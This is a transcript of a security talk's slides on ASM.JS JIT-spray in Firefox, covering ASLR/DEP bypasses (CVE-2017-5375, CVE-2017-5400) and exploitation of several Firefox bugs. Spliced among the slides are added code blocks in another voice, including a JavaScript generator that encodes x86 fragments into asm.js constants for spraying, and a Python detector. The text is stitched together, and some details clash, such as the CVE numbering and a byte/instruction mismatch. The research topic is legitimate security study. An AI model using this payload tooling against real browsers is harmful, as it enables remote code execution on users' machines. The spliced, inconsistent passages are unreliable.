From Assembly to Javascript and back: Turning … (source: repository.root-me.org/Exploitation - Système/EN...)
TRANSCRIPT
![Page 1: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/1.jpg)
Robert Gawlik
Ruhr University Bochum
February 12-17 // Berlin
From Assembly to Javascript and back: Turning Memory Errors into Code Execution with Client-side Compilers
About me
• IT Security since 2010
• PostDoc, Systems Security Group @ Horst Görtz Institute / Ruhr-University Bochum
• Focus on low-level security, binary analysis and exploitation, fuzzing, client-side mitigations/attacks
• @rh0_gz, [email protected]
Agenda
• JIT-Spray and previous work
• ASM.JS and JIT-Spray:
  – #1 CVE-2017-5375
  – #2 CVE-2017-5400 (bypass of patch for #1)
• Generic ASM.JS payload generation
• Exploitation with ASM.JS JIT-Spray
  – CVE-2016-9079, CVE-2016-2819, CVE-2016-1960
2018
// JIT-Spray //
JIT: Just-In-Time Compilation (JIT)
• Generate native machine code from higher-level language
• Performance gain compared to interpreted execution
• Several compilers and optimization layers
  – Webkit: Baseline, DataFlowGraph, FasterThanLight
  – Firefox: Baseline, JaegerMonkey (deprecated), IonMonkey
  – Chromium: CrankShaft (deprecated), TurboFan
  – eBPF-JIT
  – … you name it (Tamarin, NanoJit, etc.)
JIT-Spray
1. Hide native instructions in constants of high-level language

    c = 0xa8909090
    c += 0xa8909090

Emitted JIT code:

    00: b8909090a8    mov eax, 0xa8909090
    05: 05909090a8    add eax, 0xa8909090

x86 disassembly @ offset 1 (the constant's top byte 0xa8 turns the following opcode 05 into "test al, 5", a semantic nop):

    01: 90            nop
    02: 90            nop
    03: 90            nop
    04: a805          test al, 5    ; semantic nop
    06: 90            nop
    07: 90            nop
    08: 90            nop
JIT-Spray
1. Hide native instructions in constants of high-level language
2. Force allocations to predictable address regions

    function JIT() {
        c = 0xa8909090
        c += 0xa8909090
    }

    while (!address_hit) {
        createFuncAndJIT()    // each iteration defines a fresh function so the engine emits another copy
    }

    0x20202021: 90      nop
    0x20202022: 90      nop
    0x20202023: 90      nop
    0x20202024: a805    test al, 5
    0x20202026: 90      nop
    0x20202027: 90      nop
    0x20202028: 90      nop

Predictable?!

Used to bypass DEP and ASLR: no infoleak and no code reuse necessary
JIT-Spray: Flash JIT Spray (Dionysus Blazakis, 2010)
• Targets ActionScript (Tamarin VM)
• Long XOR sequence gets compiled to XOR instructions
• First of its kind known to public
• Mitigated by constant folding
  → Bypassed with “IN” operator (VAL0 IN VAL1 ^ VAL2 ^ ..)
• ... and mitigated with random NOP insertion
JIT-Spray: Writing JIT Shellcode (Alexey Sintsov, 2010)
• Nice methods to ease and automate payload generation:
  – split long instructions into instructions <= 3 bytes
  – semantic nops which don’t change flags

    mov ebx, 0xb1b2b3b4        ; 5 bytes

    mov ebx, 0xb1b2xxxx        ; 3 bytes
    mov bh, 0xb3               ; 2 bytes
    mov bl, 0xb4               ; 2 bytes

Emitted JIT code:

    00: b89090906a    mov eax, 0x6a909090
    05: 05909090a8    add eax, 0xa8909090

x86 disassembly @ offset 3 (the constant's top byte 0x6a swallows the following opcode 05 as "push 5", which leaves the flags untouched):

    03: 90            nop
    04: 6a05          push 5
JIT-Spray: JIT-Spray Attacks & Advanced Shellcode (Alexey Sintsov, 2010)
• JIT-Spray in Apple Safari on Windows possible:
  – use two of four immediate bytes as payload
  – connect payload bytes with short jumps (stage0)
  – copy stage1 payload to RWX JIT page and jump to it
• Still works in Windows 10 on old Safari (CVE-2010-1939)
JIT-Spray: Attacking Clientside JIT Compilers (Chris Rohlf & Yan Ivnitskiy, 2011)
• In-depth analysis of LLVM and Firefox JIT engines
• JIT-Spray techniques (e.g., with floating point values)
• JIT gadget techniques (gaJITs)
• Comparison of JIT hardening measures
JIT-Spray: Flash JIT – Spraying info leak gadgets (Fermin Serna, 2013)
• Bypass ASLR and random NOP insertion:
  – spray few instructions to a predictable address, which prevents random NOPs
  – trigger UAF bug and call JIT gadget
  – JIT gadget writes return address into heap spray, continue execution in JS
• Mitigated with constant blinding in Flash 11.8
JIT-Spray: Exploit Your Java Native Vulnerabilities on Win7/JRE7 in One Minute (Yuki Chen, 2013)
• School book JIT-Spray on the Java Runtime Environment (JRE 7)
• 3 of 4 bytes of one constant usable as payload
• Spray multiple functions to hit predictable address (32-bit)
• Jump to it with EIP control
JIT-Spray: JIT Spraying Never Dies - Bypass CFG By Leveraging WARP Shader JIT Spraying (Bing Sun et al., 2016)
• WARP: software rasterizer, shaders usable from WebGL
• Shader JIT code allocations predictable
• No CFG for JIT-ed code
• Various challenges for 64-bit MS Edge, e.g., arbitrary read/write necessary
// ASM.JS JIT-Spray //
ASM.JS
• Appeared in 2013 in Firefox 22
• First thought: use it for JIT-Spray! However, the idea was not pursued until the end of 2016
• Ahead-Of-Time (AOT) compiler
• No need to execute the JS frequently to get it compiled, as in traditional JITs
• Generates a binary blob with native machine code
ASM.JS: Simple ASM.JS module
• Prolog directive ("use asm")
• ASM.JS module body
• Your “calculations”
ASM.JS: First test with Firefox
• Request ASM.JS module several times
• Search for 0xc1c2c3c4 in memory

    0:031> s -d 0 L?ffffffff c1c2c3c4
    09bf9024  c1c2c3c4 c4839066 0d8bc304 00000000
    0a720024  c1c2c3c4 c4839066 0d8bc304 0a721000
    0a730024  c1c2c3c4 c4839066 0d8bc304 0a731000
    0a740024  c1c2c3c4 c4839066 0d8bc304 0a741000
    0a750024  c1c2c3c4 c4839066 0d8bc304 0a751000
    0a760024  c1c2c3c4 c4839066 0d8bc304 0a761000
    ...

Wait what?!?
Many requests yield many copies?
It is 64k aligned (0xXXXX0024)?
Looks promising :-)
ASM.JS: First test with Firefox
… indeed: the constant is compiled ahead of time into code at a predictable address

    0:031> u 10100023 L 4
    10100023 b8c4c3c2c1      mov eax,0C1C2C3C4h
    10100028 6690            xchg ax,ax
    1010002a 83c404          add esp,4
    1010002d c3              ret
ASM.JS JIT-Spray: CVE-2017-5375
• Example: nop sled with ASM.JS (Firefox 50.0.1 32-bit)
• No infoleak, no code reuse: use your vuln to point EIP to your payload
ASM.JS JIT-Spray: CVE-2017-5375
• The flaw (simplified)
  1) ASM.JS module is compiled into an RW region
  2) each module request executes VirtualAlloc
  3) → many RW regions at 64k granularity → predictable
  4) compiled module code is copied many times to RW regions
  5) RW regions are VirtualProtect’ed to RX
• The patch
  1) Randomize VirtualAlloc allocations

    randomAddr = ComputeRandomAllocationAddress();
    p = VirtualAlloc(randomAddr, ...
    if (!p) {
        // Try again without randomAddr.
        p = VirtualAlloc(nullPtr, ...

  2) Limit ASM.JS RX code per process to 160MB

    maxCodeBytesPerProcess = 160 * 1024 * 1024;

Fixed in Firefox 51
Bypass it! :) → CVE-2017-5400
ASM.JS JIT-Spray: CVE-2017-5400
• Bypass patch #1: force the fallback code
  – occupy as many 64k addresses as possible with a Typed Array heap spray to decrease entropy
    → randomAddr ASM.JS JIT allocations will fail
    → fallback allocations become predictable again

    p = VirtualAlloc(randomAddr, ...
    if (!p) {
        // Try again without randomAddr.
        p = VirtualAlloc(nullPtr, ...

• Bypass patch #2: stay within the ASM.JS code limit of 160MB ;)
  – spray the maximum number of allocations allowed, assuming that each module will be < 64KB (est. good enough for exploitation :P)

    maxCodeBytesPerProcess = 160 * 1024 * 1024;

• Release memory allocated with the Typed Array spray (#1)
ASM.JS JIT-Spray: CVE-2017-5400
• The patch
  – major redesign
  – reserve the maxCodeBytesPerProcess range on startup
    → difficult to predict address
  – commit/decommit from this set of pages for ASM.JS/Wasm when requested
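To make the interplay between the two patch steps, the typed-array bypass and the redesign concrete, here is an added model (my own code, not Firefox's allocator) of the three allocation policies the slides describe: one VirtualAlloc(NULL) per module request (Firefox 50), a random hint with silent fallback plus the 160MB cap (Firefox 51), and a range reserved once at startup (the post-CVE-2017-5400 redesign). It assumes a 2GB 32-bit address space cut into 64KB slots, that VirtualAlloc(NULL) returns the lowest free slot, that each module occupies exactly one slot, and it uses a seeded LCG in place of ComputeRandomAllocationAddress; the policy and function names are mine.

```javascript
// Added model, not Firefox's code: how three asm.js code-allocation policies
// behave against the CVE-2017-5400 bypass (typed-array spray, then modules).
// The 32-bit address space is modelled as 64 KiB slots; "lowest free slot"
// stands in for VirtualAlloc(NULL) placement and a small LCG stands in for
// ComputeRandomAllocationAddress. Both are assumptions of this model.
"use strict";

const SLOT = 0x10000;                                 // VirtualAlloc granularity
const SPACE_SLOTS = 0x7fff0000 / SLOT;                // ~2 GiB user space = 32767 slots
const CODE_LIMIT_SLOTS = (160 * 1024 * 1024) / SLOT;  // maxCodeBytesPerProcess = 2560 modules of 64 KiB

class AddressSpace {
  constructor(seed) {
    this.used = new Uint8Array(SPACE_SLOTS);
    this.seed = seed >>> 0;
  }
  rand() {                       // reproducible stand-in for a random address hint
    this.seed = (Math.imul(this.seed, 1664525) + 1013904223) >>> 0;
    return this.seed;
  }
  allocAt(slot) {                // VirtualAlloc(hint): fails if the slot is taken
    if (slot < 0 || slot >= SPACE_SLOTS || this.used[slot]) return -1;
    this.used[slot] = 1;
    return slot;
  }
  allocAnywhere() { return this.allocAt(this.used.indexOf(0)); } // VirtualAlloc(NULL), modelled as first fit
  free(slot) { this.used[slot] = 0; }
}

const POLICIES = {
  // Firefox 50 (CVE-2017-5375): one VirtualAlloc(NULL) per module request.
  prePatch: {
    startup() {},
    alloc(space) { return space.allocAnywhere(); },
  },
  // Firefox 51 patch: random hint, silent fallback to VirtualAlloc(NULL),
  // and at most 160 MB of asm.js code per process.
  randomHint: {
    startup() {},
    alloc(space, st) {
      if (st.committed >= CODE_LIMIT_SLOTS) return -1;
      st.committed++;
      const hinted = space.allocAt(space.rand() % SPACE_SLOTS);
      return hinted !== -1 ? hinted : space.allocAnywhere();
    },
  },
  // Post-CVE-2017-5400 redesign: reserve the whole 160 MB range once at a
  // random base during startup and commit modules from it afterwards.
  reserveOnce: {
    startup(space, st) {
      st.base = space.rand() % (SPACE_SLOTS - CODE_LIMIT_SLOTS);
      for (let i = 0; i < CODE_LIMIT_SLOTS; i++) space.used[st.base + i] = 1;
    },
    alloc(space, st) {
      return st.committed < CODE_LIMIT_SLOTS ? st.base + st.committed++ : -1;
    },
  },
};

// The bypass procedure from the slides: fill every free 64 KiB slot with typed
// arrays except a hole the attacker picks, request modules (fewer than the code
// limit allows), then release the spray. Returns the fraction of modules that
// landed inside the hole, i.e. at addresses the attacker predicted in advance.
function runBypass(policy, { seed = 1, holeStart = 0, modules = 64, spray = true } = {}) {
  const space = new AddressSpace(seed);
  const st = { committed: 0 };
  policy.startup(space, st);       // the redesign reserves its range before any page runs
  const sprayed = [];
  if (spray) {
    for (let s = 0; s < SPACE_SLOTS; s++) {
      if (s >= holeStart && s < holeStart + modules) continue;   // leave the hole free
      if (space.allocAt(s) !== -1) sprayed.push(s);
    }
  }
  let hits = 0;
  for (let i = 0; i < modules; i++) {
    const slot = policy.alloc(space, st);
    if (slot >= holeStart && slot < holeStart + modules) hits++;
  }
  for (const s of sprayed) space.free(s);                       // release the typed-array spray
  return hits / modules;
}
```

The hole is the region the spray deliberately leaves free, so under the fallback policy the attacker chooses where the modules land instead of guessing: every random hint collides with the spray, and VirtualAlloc(NULL) can only hand out the hole. The reserved-range policy ignores the spray entirely because the reservation predates it. Real VirtualAlloc placement is not strictly first fit and other allocations compete for the address space, so read the hit rates as an illustration of the argument, not as a measurement.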
// ASM.JS Payloads //
ASM.JS Payloads: Injecting machine code with ASM.JS
• How to write arbitrary payloads?
• Arithmetic instructions
  – problems:
    - constant folding
    - test changes flags

    01: 90            nop
    02: 90            nop
    03: 90            nop
    04: a805          test al, 5
    06: 90            nop
    07: 90            nop
    08: 90            nop

• Setting array elements
  – 2 payload bytes per element, connected with jumps

    01: 90            nop
    02: 90            nop
    03: eb0c          jmp 0x11
    ..
    11: 90            nop
    12: 90            nop
    13: eb0c          jmp 0x21
ASM.JS Payloads: Injecting machine code with ASM.JS
• Using ASM.JS imports (Foreign Function Interface)
  – import a JS function into your ASM.JS code
  – call it with many parameters
  – hide payload in parameters

Emitted code:

    00: c70424909090a9      mov dword [esp], 0xa9909090
    07: c7442404909090a9    mov dword [esp + 4], 0xa9909090
    0f: c7442408909090a9    mov dword [esp + 8], 0xa9909090

x86 disassembly @ offset 3:

    03: 90                  nop
    04: 90                  nop
    05: 90                  nop
    06: a9c7442404          test eax, 42444C7h
    0b: 90                  nop
    0c: 90                  nop
    0d: 90                  nop
    0e: a9c7442408          test eax, 82444C7h

→ 3 payload bytes per instruction
→ large semantic nops: the constant's top byte 0xa9 turns the 4-byte head of the next mov into the immediate of "test eax, imm32"
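As an added example (my code, not the slides' generator), the following JavaScript puts the pieces from the JIT-Spray slides and this FFI slide together: it encodes x86 fragments of at most 3 bytes into constants whose top byte is the semantic-nop opcode (0xa8 for the mov/add layout, 0xa9 for the FFI layout), models the emitted bytes using the patterns shown on the slides, walks them from the payload offset to confirm the fragments are reached, and emits an asm.js module of the shape described under "Simple ASM.JS module" ("use asm" prolog, module body, an imported function called with the constants). The function names, the LAYOUTS table, the disp8 limit of 32 stack slots per call and the sample fragments are my assumptions; whether a given Firefox build compiles the generated module ahead of time, and at which address, can only be checked in the browser, e.g. with the `s -d` search from the first-test slide.

```javascript
// Added example (not the slides' code): hide x86 fragments in 32-bit constants
// whose top byte is a semantic-nop opcode, model the bytes an asm.js-style
// compiler emits for them (patterns copied from the slides), and walk those
// bytes from the payload offset to check that the fragments are reached.
"use strict";

// Two constant layouts from the slides. The constant's top byte is a TEST
// opcode whose immediate swallows the head of the following instruction:
//   arithmetic: mov eax,imm32 (b8) / add eax,imm32 (05); 0xa8 = test al,imm8
//               eats the 1-byte opcode of the next add.
//   ffi:        mov dword [esp+disp8],imm32 (c7 44 24 dd); 0xa9 = test eax,imm32
//               eats the 4-byte head of the next mov.
// The 32-slot limit is this model's assumption: beyond disp8 the compiler would
// need a longer addressing form, which a 5-byte TEST can no longer swallow.
const LAYOUTS = {
  arithmetic: {
    nopOpcode: 0xa8, headLen: 1, payloadOffset: 1,
    head: (i) => [i === 0 ? 0xb8 : 0x05],
  },
  ffi: {
    nopOpcode: 0xa9, headLen: 4, payloadOffset: 3,
    head: (i) => {
      if (i === 0) return [0xc7, 0x04, 0x24];                    // mov [esp], imm32
      if (i > 31) throw new RangeError("disp8 form reaches only 32 stack slots");
      return [0xc7, 0x44, 0x24, 4 * i];                           // mov [esp+4*i], imm32
    },
  },
};

// Each fragment is one instruction of at most 3 bytes (Sintsov's rule), padded
// with nop. TEST rewrites the flags, so no fragment may depend on flags set by
// the previous one, and the last fragment must transfer control itself because
// the trailing TEST still swallows whatever real code follows the final mov.
function encodeFragments(fragments, layout) {
  return fragments.map((frag) => {
    if (frag.length < 1 || frag.length > 3) {
      throw new RangeError(`fragment must be 1..3 bytes, got ${frag.length}`);
    }
    const b = [...frag, 0x90, 0x90].slice(0, 3);
    return (b[0] | (b[1] << 8) | (b[2] << 16) | (layout.nopOpcode << 24)) >>> 0;
  });
}

// Emitted code model: instruction head followed by the little-endian imm32.
function modelEmittedCode(consts, layout) {
  const out = [];
  consts.forEach((c, i) => {
    out.push(...layout.head(i), c & 0xff, (c >>> 8) & 0xff, (c >>> 16) & 0xff, c >>> 24);
  });
  return out;
}

// Follow the bytes as the CPU would once EIP lands on the payload offset: three
// payload bytes, the TEST opcode, and its immediate (= the next instruction
// head). Returns the payload bytes reached; throws if the stream desynchronises.
function walkFromPayloadOffset(code, layout) {
  const reached = [];
  for (let pc = layout.payloadOffset; pc + 4 <= code.length; pc += 4 + layout.headLen) {
    if (code[pc + 3] !== layout.nopOpcode) throw new Error(`desync at offset ${pc + 3}`);
    reached.push(code[pc], code[pc + 1], code[pc + 2]);
  }
  return reached;
}

// asm.js module text in the shape the slides describe: "use asm" prolog, module
// body, and an imported JS function called with the constants as signed ints.
// Whether an engine actually compiles it ahead of time is not checked here.
function buildAsmJsModuleSource(consts) {
  const args = consts.map((c) => `0x${c.toString(16)}|0`).join(", ");
  return [
    "function asmModule(stdlib, foreign, heap) {",
    '  "use asm";',
    "  var ffi = foreign.ffi;",
    "  function payload() {",
    `    ffi(${args});`,
    "  }",
    "  return payload;",
    "}",
  ].join("\n");
}

// One "module request": evaluate the source afresh (an AOT compiler would emit
// another copy), link it against a recording ffi, run it, and return the values
// the ffi received as unsigned 32-bit numbers.
function requestModule(src) {
  const received = [];
  const factory = new Function(`${src}\nreturn asmModule;`)();
  const payload = factory({}, { ffi: (...a) => received.push(...a) }, new ArrayBuffer(0x10000));
  payload();
  return received.map((v) => v >>> 0);
}

// Constructed sample fragments, not a working shellcode: xor eax,eax; push eax; push 5
const SAMPLE_FRAGMENTS = [[0x31, 0xc0], [0x50], [0x6a, 0x05]];
```

`walkFromPayloadOffset` reproduces the decoding shown at offsets 03..0e above. Running the same fragments through both layouts shows why the FFI form is attractive: still three payload bytes per constant, but the TEST immediate now absorbs the whole 4-byte mov head including the compiler-chosen displacement, so the payload does not depend on those bytes at all. In the browser the remaining question is placement, which the `s -d` search from the first-test slide answers.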
ASM.JS PayloadsInjecting machine code with ASM.JS
• Double values as parameters for FFI
![Page 63: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/63.jpg)
ASM.JS PayloadsInjecting machine code with ASM.JS
• Double values as parameters for FFI
emitted code
![Page 64: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/64.jpg)
ASM.JS PayloadsInjecting machine code with ASM.JS
• Double values as parameters for FFI
emitted code – double constant values are referenced
![Page 65: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/65.jpg)
ASM.JS PayloadsInjecting machine code with ASM.JS
• Double values as parameters for FFI
emitted code – double constant values are referenced
![Page 66: From Assembly to Javascript and back: Turning …repository.root-me.org/Exploitation - Système/EN...Turning Memory Errors into Code Execution with Client-side Compilers About me •](https://reader035.vdocument.in/reader035/viewer/2022071102/5fdb15e0946e34395b739ecf/html5/thumbnails/66.jpg)
ASM.JS PayloadsInjecting machine code with ASM.JS
• Double values as parameters for FFI
emitted code – double constant values are referenced – constants are executable! – constants are continuous in memory! – full constant usable as payload!
– able to inject continuous code!
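As an added example (not the author's tooling), the following Python heuristic is what a defender could run over a captured page to recognise the two constant-embedding schemes just described, the 0xa9-tagged 32-bit immediates with 3 payload bytes each and the double constant pool, and to recover the bytes they would place in executable memory. The regexes, the threshold and the sample module are my own assumptions.

```python
import re
import struct

# Opcode of "test eax, imm32": the top byte the slides put in every 32-bit
# immediate so that it becomes a semantic nop swallowing the bytes after it.
TEST_EAX_IMM32 = 0xA9

USE_ASM_RE = re.compile(r'function\s+[\w$]+\s*\([^)]*\)\s*\{\s*["\']use asm["\']')
CALL_RE = re.compile(r'\b([A-Za-z_$][\w$]*)\s*\(([^()]*)\)')
NUMBER_RE = re.compile(
    r'(?<![\w.$])(0[xX][0-9a-fA-F]+|\d+(?:\.\d*)?(?:[eE][+-]?\d+)?)(?![\w.$])')

def classify(literal):
    """Return ("int", value) or ("double", value) for a JS numeric literal."""
    low = literal.lower()
    if low.startswith("0x"):
        return "int", int(low, 16)
    if "." in low or "e" in low:
        return "double", float(low)
    return "int", int(low)

def call_literals(source):
    """Yield every numeric literal written directly as a call argument."""
    for call in CALL_RE.finditer(source):
        yield from NUMBER_RE.findall(call.group(2))

def recover_int_payload(source):
    """Low three bytes of every nop-tagged 32-bit immediate, concatenated: the
    stream executed when the emitted code is entered at offset +3."""
    out = bytearray()
    for kind, value in map(classify, call_literals(source)):
        if kind == "int" and value <= 0xFFFFFFFF and value >> 24 == TEST_EAX_IMM32:
            out += struct.pack("<I", value)[:3]
    return bytes(out)

def double_pool_bytes(source):
    """Raw IEEE-754 bytes of double arguments, back to back as in the constant pool."""
    out = bytearray()
    for kind, value in map(classify, call_literals(source)):
        if kind == "double":
            out += struct.pack("<d", value)
    return bytes(out)

def scan(source, threshold=8):
    """Flag an asm.js module whose FFI calls carry many payload-capable constants."""
    tagged = len(recover_int_payload(source)) // 3
    doubles = len(double_pool_bytes(source)) // 8
    asm_js = USE_ASM_RE.search(source) is not None
    return {"asm_js": asm_js, "nop_tagged_ints": tagged, "doubles": doubles,
            "suspicious": asm_js and tagged + doubles >= threshold}

# Constructed sample (not from the slides): their 0xa9909090 constant (nop nop nop
# plus the test-eax glue byte) passed three times to an FFI import, then two doubles.
SAMPLE = '''
function Module(stdlib, foreign, heap) {
  "use asm";
  var ffi = foreign.ffi;
  function run() {
    ffi(0xa9909090, 0xa9909090, 0xa9909090);
    ffi(+1.0, +2.5);
  }
  return run;
}
'''
```

The recovered byte stream is what an analyst would hand to a disassembler; the threshold only separates ordinary asm.js numerics from a spray and should be tuned on benign corpora.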
ASM.JS Payloads: Generating arbitrary payloads
• Embed attacker instructions in ASM.JS values
• Stage0 which overwrites JIT code with arbitrary shellcode?
– Nope: W^X in ASM.JS/Wasm code pages since Firefox 46
• Solution: feature-rich stage0 payload
• Payload should consist of instructions <= 2 (or 3) bytes
ASM.JS Payloads: Automated payload generation
• Assembly → machine code → ASM.JS → machine code
• “Comfortably” write your stage0 shellcode in NASM syntax
• Python wrapper assembles it, fixes instructions, branch distances, etc.
• Output: ASM.JS code containing our payload
ASM.JS Payloads: Automated payload generation
• Problems of automated payload generation:
– x86 instruction size <= 3 bytes (arithmetics) or <= 2 bytes (parameter passing)
– branch target distance, loops?
– side effects of semantic nops?
ASM.JS Payloads: Automated payload generation
• Some problems solved
– transform MOVs
– preserve flags when needed
– loop and branch adjustments
ASM.JS Payloads: Automated payload generation
• Transform MOVs (example)
• Instructions <= 2 bytes
→ stage0 compatible
[figure: ASM.JS code]
[figure: sprayed ASM.JS payload]
ASM.JS Payloads: Automated payload generation
• Preserve flags when needed
- payload we want to insert:
3C 10  CMP AL, 61
74 0E  JE $+0x10
- sprayed payload:
3C 10  CMP AL, 61
A8 05  TEST AL, 05
74 0E  JE $+0x10
→ semantic nop kills flags
- save and restore flags around semantic nop:
3C 10  CMP AL, 61
9C     PUSHFD        --> save flags
A8 05  TEST AL, 05   --> kills flags
9D     POPFD         --> restore flags
74 0E  JE $+0x10
2018
// Exploitation //
ASM.JS JIT-Spray Exploits: Exploiting CVE-2017-9079
• Appeared in the wild (Tor Browser)
• Analysis and bug trigger available in Mozilla Bug report
• Take crashing testcase – find a road to EIP to write alternative exploit with ASM.JS JIT-Spray
• Easy… looking into Firefox source code was not even necessary
• Firefox 50.0.1 32-bit
– ECX is controlled at xul.dll + 0x7a00dd
(1868.197c): Access violation - code c0000005 (first chance)
mov eax,dword ptr [ecx+0ACh] ds:002b:414141ed=????????
0:000> ?eip-xul
Evaluate expression: 7995613 = 007a00dd
– find EIP control after xul.dll + 0x7a00dd → … follow 5 calls and you find:
xul + 0x1c0cb8: call dword [eax + 0x138]
– Exploit:
- ASM.JS JIT-Spray to 0x1c1c0054
- Typed Array spray for controlling memory at ECX and EAX
- Trigger the bug
Demo Time
ASM.JS JIT-Spray Exploits: Exploiting CVE-2016-2819
• Firefox 46.0.1 32-bit
• “HTML5 parser heap-buffer-overflow”
• Analysis and crashing testcase available in Mozilla Bug Report
• Patched at several vulnerable code paths
• Crashing testcase targets difficult to exploit code path:
– bruteforce necessary
• Further analysis based on other patched code paths:
– easier to exploit code path available
– modification of crashing testcase reaches path :-)
• Easier-to-exploit code path:
1) integer underflow
2) control over node object
3) group is constant → no need to bruteforce
4) pop() calls node→release() → EIP control
Demo Time
ASM.JS JIT-Spray Exploits: Exploiting CVE-2016-1960
• Firefox 44.0.2 32-bit
• “Use-after-free in HTML5 string parser”
• Analysis and crashing testcase available in Mozilla Bug Report
• Looks suspiciously similar to CVE-2016-2819
• While the crashing testcase is different from CVE-2016-2819, it exercises the same (difficult to exploit) code path → public exploit uses bruteforce approach
• Let’s try something: modify crashing testcase in the same way as for CVE-2016-2819 → works! EIP control and ASM.JS payload execution
• Cause: a vulnerable code path was left open...
Demo Time
Conclusion
• ASM.JS in Firefox was the perfect JIT-Spray target
• Gapless constant pool JIT-Spray on x86
• Generic payload transformation into ASM.JS code
• What about 64-bit Firefox, Chrome and Edge?
• Other RCE mitigations (CFG, ACG, ...) and isolation mechanisms (sandbox, WDAG, ...) not considered.
Thank you!
Questions?